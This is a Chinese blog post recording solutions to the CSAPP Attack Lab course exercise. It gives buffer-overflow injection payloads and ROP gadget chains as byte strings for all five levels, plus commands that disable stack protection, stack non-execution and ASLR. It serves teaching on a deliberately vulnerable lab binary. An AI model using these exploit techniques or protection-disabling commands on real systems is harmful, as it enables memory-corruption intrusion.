<!DOCTYPE html>
<html lang="zh-CN">





<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/favicon.png">
  <link rel="icon" type="image/png" href="/img/favicon.png">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="description" content="A Coder&#39;s World">
  <meta name="author" content="YoungOcean">
  <meta name="keywords" content>
  <title>attack_lab记录 - Young&#39;s Blog</title>

  <link rel="stylesheet" href="https://cdn.staticfile.org/twitter-bootstrap/4.4.1/css/bootstrap.min.css">


  <link rel="stylesheet" href="https://cdn.staticfile.org/github-markdown-css/4.0.0/github-markdown.min.css">
  <link rel="stylesheet" href="/lib/hint/hint.min.css">

  
    <link rel="stylesheet" href="https://cdn.staticfile.org/highlight.js/10.0.0/styles/github-gist.min.css">
  

  


<!-- 主题依赖的图标库，不要自行修改 -->
<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_yg9cfy8wd6.css">

<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_pjno9b9zyxs.css">

<link rel="stylesheet" href="/css/main.css">

<!-- 自定义样式保持在最底部 -->


  <script src="/js/utils.js"></script>
</head>


<body>
  <header style="height: 80vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand"
       href="/">&nbsp;<strong>Young's Blog</strong>&nbsp;</a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                首页
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                归档
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                分类
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                标签
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                关于
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/links/">
                <i class="iconfont icon-link-fill"></i>
                友链
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" data-toggle="modal" data-target="#modalSearch">&nbsp;&nbsp;<i
                class="iconfont icon-search"></i>&nbsp;&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="view intro-2" id="background" parallax=true
         style="background: url('http://qn.blogyoung.top/20200728160058.png') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.1)">
          <div class="container text-center white-text fadeInUp">
            <span class="h2" id="subtitle">
              
            </span>

            
              
  <div class="mt-3 post-meta">
    <i class="iconfont icon-date-fill" aria-hidden="true"></i>
    <time datetime="2020-07-28 15:56">
      2020年7月28日 下午
    </time>
  </div>


<div class="mt-1">
  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      2.3k 字
    </span>
  

  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      36
       分钟
    </span>
  

  
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid">
  <div class="row">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-md">
      <div class="container nopadding-md" id="board-ctn">
        <div class="py-5" id="board">
          <div class="post-content mx-auto" id="post">
            
              <p class="note note-info">
                
                  本文最后更新于：2020年7月28日 下午
                
              </p>
            
            <article class="markdown-body">
              <h1 id="attack-lab-实验记录"><a href="#attack-lab-实验记录" class="headerlink" title="attack lab 实验记录"></a>attack lab 实验记录</h1><h2 id="1-实验目的"><a href="#1-实验目的" class="headerlink" title="1.实验目的"></a>1.实验目的</h2><ul>
<li>了解缓冲溢出攻击</li>
<li>了解ROP攻击</li>
<li>熟悉gdb的使用</li>
<li>进一步学习自动化的插入脚本,加快破解速度</li>
</ul>
<h2 id="2-实验准备"><a href="#2-实验准备" class="headerlink" title="2.实验准备"></a>2.实验准备</h2><p>实验前需阅读相关章节并仔细阅读指导手册</p>
<blockquote>
<p>Your solutions may not use attacks to circumvent the validation code in the programs. Specifically, any address you incorporate into an attack string for use by a ret instruction should be to one of the following destinations: </p>
<p>– The addresses for functions touch1, touch2, or touch3.</p>
<p>– The address of your injected code </p>
<p>– The address of one of your gadgets from the gadget farm.</p>
<p>These are called exploit strings.  漏洞利用字符</p>
<p>Both CTARGET and RTARGET take several different command line arguments:</p>
<p>-h: Print list of possible command line arguments </p>
<p>-q: Don’t send results to the grading server </p>
<p>-i FILE: Supply input from a file, rather than from standard input</p>
</blockquote>
<p><img src="http://qn.blogyoung.top/20200728101752.png" srcset="/img/loading.gif" alt></p>
<p>防御的三种手段</p>
<ul>
<li>栈随机化  ASLR（内存地址随机化）  heap和local的地址会改变</li>
<li>栈破坏检测 Stack Protector（栈保护）</li>
<li>限制可执行代码区 DEP（堆栈不可执行）</li>
</ul>
<p>思考:</p>
<p>1.为什么代码会出现在栈上,他们本应该出现在下面的文本段</p>
<ul>
<li>如果未开启栈保护机制,可以直接将我们想要执行的代码加在栈上</li>
<li>如果开启了栈保护机制,则需要考虑rop,使用程序原本的代码片段(gadgets)</li>
</ul>
<p>2.字节序的问题</p>
<ul>
<li>除了solar的系统,基本上其他系统都是<code>little-endian</code>字节序，即低位在低地址，高位在高地址。</li>
<li>我们输入机器码的时候,是从低地址到高地址,所以这里输入前需要转换一下</li>
</ul>
<p>课程截图;</p>
<p><img src="http://qn.blogyoung.top/image-20200728112723025.png" srcset="/img/loading.gif" alt="image-20200728112723025"></p>
<p><img src="http://qn.blogyoung.top/image-20200728113437138.png" srcset="/img/loading.gif" alt="image-20200728113437138"></p>
<p>上述两张图说明了两个问题:</p>
<ul>
<li><p>返回地址是绝对地址,而不是像jmp和call一样的相对地址,因此也方便插入自己的代码地址</p>
</li>
<li><p>x64系统把%rip设置为不可见了,但是任然是按照顺序执行,具体的操作准备后续了解</p>
</li>
</ul>
<p>实验时,需要知道缓冲区的大小,需要用gdb进行反汇编查看分配的空间</p>
<p><img src="http://qn.blogyoung.top/image-20200728155356611.png" srcset="/img/loading.gif" alt="image-20200728155356611"></p>
<p>同理,通过此方法查看每一个函数的入口地址</p>
<h2 id="3-解题过程"><a href="#3-解题过程" class="headerlink" title="3.解题过程"></a>3.解题过程</h2><h3 id="level1-注意点"><a href="#level1-注意点" class="headerlink" title="level1 注意点"></a>level1 注意点</h3><blockquote>
<p>• All the information you need to devise your exploit string for this level can be determined by examining a disassembled version of CTARGET. Use objdump -d to get this dissembled version.<br>• The idea is to position a byte representation of the starting address for touch1 so that the ret<br>instruction at the end of the code for getbuf will transfer control to touch1.<br>• Be careful about byte ordering.<br>• You might want to use GDB to step the program through the last few instructions of getbuf to make<br>sure it is doing the right thing.<br>• The placement of buf within the stack frame for getbuf depends on the value of compile-time<br>constant BUFFER_SIZE, as well the allocation strategy used by GCC. You will need to examine the<br>disassembled code to determine its position.</p>
</blockquote>
<p>答案:</p>
<div class="hljs"><pre><code class="hljs assembly">00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
c0 17 40 00 00 00 00 00  /* this address is touch1 , return to touch1 then success*/</code></pre></div>

<h3 id="level2-注意点"><a href="#level2-注意点" class="headerlink" title="level2 注意点"></a>level2 注意点</h3><blockquote>
<p>• You will want to position a byte representation of the address of your injected code in such a way that<br>ret instruction at the end of the code for getbuf will transfer control to it.<br>• Recall that the first argument to a function is passed in register %rdi.<br>• Your injected code should set the register to your cookie, and then use a ret instruction to transfer<br>control to the first instruction in touch2.<br>• Do not attempt to use jmp or call instructions in your exploit code. The encodings of destination<br>addresses for these instructions are difficult to formulate. Use ret instructions for all transfers of<br>control, even when you are not returning from a call.<br>• See the discussion in Appendix B on how to use tools to generate the byte-level representations of<br>instruction sequences.</p>
</blockquote>
<p>这里第3点很有意思,不建议用jmp或call指令,因为他们的跳转采用相对地址,所以会造成麻烦的计算.我们需要用ret指令来进行重定向</p>
<p>将正常的返回地址设置为注入代码的地址,为了方便选择栈顶注入,</p>
<blockquote>
<p>test -&gt; getBuf -&gt;touch2(pass cookie)</p>
</blockquote>
<p>构造%rdi和返回地址</p>
<div class="hljs"><pre><code class="hljs assembly">movq $0x  ,%rdi  //将cookie赋值给%rdi
push //touch2的地址
ret</code></pre></div>

<p>转换成汇编代码,然后求出栈顶位置,将返回地址覆盖为栈顶位置即可</p>
<p>答案:</p>
<div class="hljs"><pre><code class="hljs assembly">48 c7 c7 fa 97 b9 59 68  /* mov $0x59b99fa, %rdi , 68-00 pushq $0x4017ec */
ec 17 40 00 c3 00 00 00  /* c3 retq */
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
78 dc 61 55 00 00 00 00  /* move to the top of the stack to run the injected code */</code></pre></div>

<h3 id="Level3-注意点"><a href="#Level3-注意点" class="headerlink" title="Level3 注意点"></a>Level3 注意点</h3><blockquote>
<p>• You will need to include a string representation of your cookie in your exploit string. The string should consist of the eight hexadecimal digits (ordered from most to least significant) without a leading “0x.”</p>
<p>• Recall that a string is represented in C as a sequence of bytes followed by a byte with value 0. Type “man ascii” on any Linux machine to see the byte representations of the characters you need.</p>
<p>• Your injected code should set register %rdi to the address of this string. </p>
<p>• When functions hexmatch and strncmp are called, they push data onto the stack, overwriting portions of memory that held the buffer used by getbuf. As a result, you will need to be careful where you place the string representation of your cookie.</p>
</blockquote>
<p>执行流程</p>
<blockquote>
<p>test -&gt; getBuf -&gt; touch3 -&gt; hexmatch -&gt; touch3</p>
</blockquote>
<p>这里由于在调用hexmath时,随机的字符指针可能会覆盖我们插入的字符,因此我们需要将字符插入父函数的栈帧</p>
<div class="hljs"><pre><code class="hljs assembly">movq $0x , %rdi   //将字符串指针赋值给%rdi
push $0x	//将此处的地址压入栈
ret</code></pre></div>

<p>答案:</p>
<div class="hljs"><pre><code class="hljs assembly">48 c7 c7 a8 dc 61 55 68	/* mov 0x5561dca0 to %rdi ,the address of string */
fa 18 40 00 c3 00 00 00 /* push 0x4018fa , the address of touch3  */
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
78 dc 61 55 00 00 00 00 /* return to the top of stack */
35 39 62 39 39 37 66 61	/* the cookie string  */
00</code></pre></div>

<hr>
<p>ROP攻击</p>
<p>以<code>ret</code>结尾的一段指令序列，我们称之为<code>gadget</code>。栈随机化后,只有代码段和全局变量段的位置不会改变,本题中,我们可以找到代码段的某些位置,将我们注入的代码重定向到这些代码中, <strong>这是一种替换程序计数器的方法</strong>,我们不能手动赋值给%rip,但是可以使用ret指令,将%rip定位到我们想要执行的地方,我们需要放入几个小段的组合代码,目的是找到程序中的gadget,即最后一个一个字节为C3的指令</p>
<p>这里有两点需要注意:</p>
<p>1.stack空间随机化,无法获取stack的首地址</p>
<p>2.无法执行stack上的指令</p>
<h3 id="level4-注意点"><a href="#level4-注意点" class="headerlink" title="level4 注意点"></a>level4 注意点</h3><blockquote>
<p>•You will need to include a string representation of your cookie in your exploit string. The string should consist of the eight hexadecimal digits (ordered from most to least significant) without a leading “0x.” </p>
<p>• Recall that a string is represented in C as a sequence of bytes followed by a byte with value 0. Type “man ascii” on any Linux machine to see the byte representations of the characters you need. </p>
<p>• Your injected code should set register %rdi to the address of this string. </p>
<p>• When functions hexmatch and strncmp are called, they push data onto the stack, overwriting portions of memory that held the buffer used by getbuf. As a result, you will need to be careful where you place the string representation of your cookie.</p>
</blockquote>
<p>答案:</p>
<div class="hljs"><pre><code class="hljs assembly">00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00  /* when finish input ,the ret to what we input the next line,and the stack to the line of fa */
ab 19 40 00 00 00 00 00  /* the address of pop %rax */
fa 97 b9 59 00 00 00 00	 /* mov 0x59b997fa to %rax */
a2 19 40 00 00 00 00 00  /* the address of mov %rax,%rdi  */
ec 17 40 00 00 00 00 00  /* return to the address of touch2  */</code></pre></div>

<h3 id="level5-注意点"><a href="#level5-注意点" class="headerlink" title="level5 注意点"></a>level5 注意点</h3><p><img src="http://qn.blogyoung.top/image-20200728154530020.png" srcset="/img/loading.gif" alt="image-20200728154530020"></p>
<blockquote>
<p>•All the gadgets you need can be found in the region of the code for rtarget demarcated by the functions start_farm and mid_farm. </p>
<p>• You can do this attack with just two gadgets. </p>
<p>• When a gadget uses a popq instruction, it will pop data from the stack. As a result, your exploit string will contain a combination of gadget addresses and data.</p>
</blockquote>
<p>思考:</p>
<p>1.为什么需要指令来计算cookie的地址,而不能直接赋值??</p>
<p>-&gt;因为我们是不知道%rsp的地址的</p>
<p>2.那如何间接获得字符串的地址??</p>
<p>-&gt;通过基址加偏移来计算 刚好用到lea指令</p>
<p>3.如何给寄存器赋立即值??</p>
<p>-&gt;由于我们不能执行指令,只能通过需pop指令来间接赋值 ,如pop %rax</p>
<p>4.如何查找所需要的片段??</p>
<p>-&gt;根据writeup查找,里面包含了各种指令的x64机器码</p>
<p>5.有没有什么捷径??</p>
<p>-&gt;没有,虽然题目是设计好的,但也需要拼凑很多代码片段,实际破解,也是需要不断地尝试,才有可能改变地址</p>
<p>答案:</p>
<div class="hljs"><pre><code class="hljs assembly">00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00   /* padding */
06 1a 40 00 00 00 00 00   /* movq %rsp,%rax */
a2 19 40 00 00 00 00 00	  /* movq %rax,%rdi */
ab 19 40 00 00 00 00 00	  /* pop %rax */
48 00 00 00 00 00 00 00	  /* 48 */
dd 19 40 00 00 00 00 00   /* movl %eax,%edx */
34 1a 40 00 00 00 00 00   /* movl %edx,%ecx */ 
13 1a 40 00 00 00 00 00	  /* movl %ecx,%esi */ 
d6 19 40 00 00 00 00 00	  /* lea (rdi,rsi,1),%rax */
a2 19 40 00 00 00 00 00   /* movq %rax,%rdi */
fa 18 40 00 00 00 00 00   /* return to touch3 */
35 39 62 39 39 37 66 61   /*  */
00</code></pre></div>

<p>参考表格:</p>
<p><img src="http://qn.blogyoung.top/image-20200728154632359.png" srcset="/img/loading.gif" alt="image-20200728154632359"></p>
<h2 id="4-其他"><a href="#4-其他" class="headerlink" title="4.其他"></a>4.其他</h2><div class="hljs"><pre><code class="hljs shell">自己创建漏洞程序的一些指令
1.关闭栈保护机制
-fno-stack-protector 
2.关闭保护栈执行机制
-z execstack
3.关闭ASLR
sudo -s
echo 0&gt;/proc/sys/kernal/randomize_va_space
exit
4.开启core dump
ulimit -c unlimited
sudo sh -c 'echo "/tmp/core.%t" &gt; /proc/sys/kernel/core_pattern'
5.不生成CFI指令
-fno-asynchronous-unwind-tables
6.不做任何优化处理
-O1</code></pre></div>

<p>参考记录:</p>
<p><a href="http://csapp.cs.cmu.edu/3e/attacklab.pdf" target="_blank" rel="noopener">官方writeup</a></p>
<p><a href="https://mcginn7.github.io/2020/02/19/CSAPP-attacklab/" target="_blank" rel="noopener">mcginn博客</a></p>

            </article>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                  <div class="post-meta mr-3">
                    <i class="iconfont icon-category"></i>
                    
                      <a class="hover-with-bg" href="/categories/csapp/">csapp</a>
                    
                  </div>
                
                
                  <div class="post-meta">
                    <i class="iconfont icon-tags"></i>
                    
                      <a class="hover-with-bg" href="/tags/lab-汇编-ROP/">-lab -汇编 -ROP</a>
                    
                  </div>
                
              </div>
              
                <p class="note note-warning">本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh" rel="nofollow noopener">CC BY-NC-SA 4.0</a> ，转载请注明出处！</p>
              
              
                <div class="post-prevnext row">
                  <div class="post-prev col-6">
                    
                    
                  </div>
                  <div class="post-next col-6">
                    
                    
                      <a href="/2020/07/27/boom_lab记录/">
                        <span class="hidden-mobile">csapp Boom_lab 实验记录</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </div>
                </div>
              
            </div>

            
          </div>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;目录</p>
  <div id="tocbot"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


    
  </main>

  
    <a id="scroll-top-button" href="#" role="button">
      <i class="iconfont icon-arrowup" aria-hidden="true"></i>
    </a>
  

  
    <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
  

  

  

  <footer class="mt-5">
  <div class="text-center py-3">
    <div>
      <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a>
      <i class="iconfont icon-love"></i>
      <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener">
        <span>Fluid</span></a>
    </div>
    
  <div class="statistics">
    
    

    
      
        <!-- 不蒜子统计PV -->
        <span id="busuanzi_container_site_pv" style="display: none">
            总访问量 
            <span id="busuanzi_value_site_pv"></span>
             次
          </span>
      
      
        <!-- 不蒜子统计UV -->
        <span id="busuanzi_container_site_uv" style="display: none">
            总访客数 
            <span id="busuanzi_value_site_uv"></span>
             人
          </span>
      
    
  </div>


    

    
  </div>
</footer>

<!-- SCRIPTS -->
<script  src="https://cdn.staticfile.org/jquery/3.4.1/jquery.min.js" ></script>
<script  src="https://cdn.staticfile.org/twitter-bootstrap/4.4.1/js/bootstrap.min.js" ></script>
<script  src="/js/debouncer.js" ></script>
<script  src="/js/main.js" ></script>

<!-- Plugins -->


  
    <script  src="/js/lazyload.js" ></script>
  



  <script defer src="https://cdn.staticfile.org/clipboard.js/2.0.6/clipboard.min.js" ></script>
  <script  src="/js/clipboard-use.js" ></script>



  <script defer src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" ></script>





  <script  src="https://cdn.staticfile.org/tocbot/4.11.1/tocbot.min.js" ></script>
  <script>
    $(document).ready(function () {
      var boardCtn = $('#board-ctn');
      var boardTop = boardCtn.offset().top;

      tocbot.init({
        tocSelector: '#tocbot',
        contentSelector: 'article.markdown-body',
        headingSelector: 'h1,h2,h3,h4,h5,h6',
        linkClass: 'tocbot-link',
        activeLinkClass: 'tocbot-active-link',
        listClass: 'tocbot-list',
        isCollapsedClass: 'tocbot-is-collapsed',
        collapsibleClass: 'tocbot-is-collapsible',
        collapseDepth: 0,
        scrollSmooth: true,
        headingsOffset: -boardTop
      });
      if ($('.toc-list-item').length > 0) {
        $('#toc').css('visibility', 'visible');
      }
    });
  </script>



  <script  src="https://cdn.staticfile.org/typed.js/2.0.11/typed.min.js" ></script>
  <script>
    var typed = new Typed('#subtitle', {
      strings: [
        '  ',
        "attack_lab记录&nbsp;",
      ],
      cursorChar: "_",
      typeSpeed: 70,
      loop: false,
    });
    typed.stop();
    $(document).ready(function () {
      $(".typed-cursor").addClass("h2");
      typed.start();
    });
  </script>



  <script  src="https://cdn.staticfile.org/anchor-js/4.2.2/anchor.min.js" ></script>
  <script>
    anchors.options = {
      placement: "right",
      visible: "hover",
      
    };
    var el = "h1,h2,h3,h4,h5,h6".split(",");
    var res = [];
    for (item of el) {
      res.push(".markdown-body > " + item)
    }
    anchors.add(res.join(", "))
  </script>



  <script  src="/js/local-search.js" ></script>
  <script>
    var path = "/local-search.xml";
    var inputArea = document.querySelector("#local-search-input");
    inputArea.onclick = function () {
      searchFunc(path, 'local-search-input', 'local-search-result');
      this.onclick = null
    }
  </script>



  <script  src="https://cdn.staticfile.org/fancybox/3.5.7/jquery.fancybox.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.staticfile.org/fancybox/3.5.7/jquery.fancybox.min.css" />

  <script>
    $('#post img:not(.no-zoom img, img[no-zoom]), img[zoom]').each(
      function () {
        var element = document.createElement('a');
        $(element).attr('data-fancybox', 'images');
        $(element).attr('href', $(this).attr('src'));
        $(this).wrap(element);
      }
    );
  </script>





  

  
    <!-- MathJax -->
    <script>
      MathJax = {
        tex: {
          inlineMath: [['$', '$'], ['\\(', '\\)']]
        },
        options: {
          renderActions: {
            findScript: [10, doc => {
              document.querySelectorAll('script[type^="math/tex"]').forEach(node => {
                const display = !!node.type.match(/; *mode=display/);
                const math = new doc.options.MathItem(node.textContent, doc.inputJax[0], display);
                const text = document.createTextNode('');
                node.parentNode.replaceChild(text, node);
                math.start = { node: text, delim: '', n: 0 };
                math.end = { node: text, delim: '', n: 0 };
                doc.math.push(math);
              });
            }, '', false],
            insertedScript: [200, () => {
              document.querySelectorAll('mjx-container').forEach(node => {
                let target = node.parentNode;
                if (target.nodeName.toLowerCase() === 'li') {
                  target.parentNode.classList.add('has-jax');
                }
              });
            }, '', false]
          }
        }
      };
    </script>

    <script async src="https://cdn.staticfile.org/mathjax/3.0.5/es5/tex-svg.js" ></script>

  



  
  
    <script>
      !function (e, t, a) {
        function r() {
          for (var e = 0; e < s.length; e++) s[e].alpha <= 0 ? (t.body.removeChild(s[e].el), s.splice(e, 1)) : (s[e].y--, s[e].scale += .004, s[e].alpha -= .013, s[e].el.style.cssText = "left:" + s[e].x + "px;top:" + s[e].y + "px;opacity:" + s[e].alpha + ";transform:scale(" + s[e].scale + "," + s[e].scale + ") rotate(45deg);background:" + s[e].color + ";z-index:99999");
          requestAnimationFrame(r)
        }

        function n() {
          var t = "function" == typeof e.onclick && e.onclick;
          e.onclick = function (e) {
            t && t(), o(e)
          }
        }

        function o(e) {
          var a = t.createElement("div");
          a.className = "heart", s.push({
            el: a,
            x: e.clientX - 5,
            y: e.clientY - 5,
            scale: 1,
            alpha: 1,
            color: c()
          }), t.body.appendChild(a)
        }

        function i(e) {
          var a = t.createElement("style");
          a.type = "text/css";
          try {
            a.appendChild(t.createTextNode(e))
          } catch (t) {
            a.styleSheet.cssText = e
          }
          t.getElementsByTagName("head")[0].appendChild(a)
        }

        function c() {
          return "rgb(" + ~~(255 * Math.random()) + "," + ~~(255 * Math.random()) + "," + ~~(255 * Math.random()) + ")"
        }

        var s = [];
        e.requestAnimationFrame = e.requestAnimationFrame || e.webkitRequestAnimationFrame || e.mozRequestAnimationFrame || e.oRequestAnimationFrame || e.msRequestAnimationFrame || function (e) {
          setTimeout(e, 1e3 / 60)
        }, i(".heart{width: 10px;height: 10px;position: fixed;background: #f00;transform: rotate(45deg);-webkit-transform: rotate(45deg);-moz-transform: rotate(45deg);}.heart:after,.heart:before{content: '';width: inherit;height: inherit;background: inherit;border-radius: 50%;-webkit-border-radius: 50%;-moz-border-radius: 50%;position: fixed;}.heart:after{top: -5px;}.heart:before{left: -5px;}"), n(), r()
      }(window, document);
    </script>
  








  <script  src="https://cdn.staticfile.org/mermaid/8.5.0/mermaid.min.js" ></script>
  <script>
    if (window.mermaid) {
      mermaid.initialize({"theme":"default"});
    }
  </script>







</body>
</html>
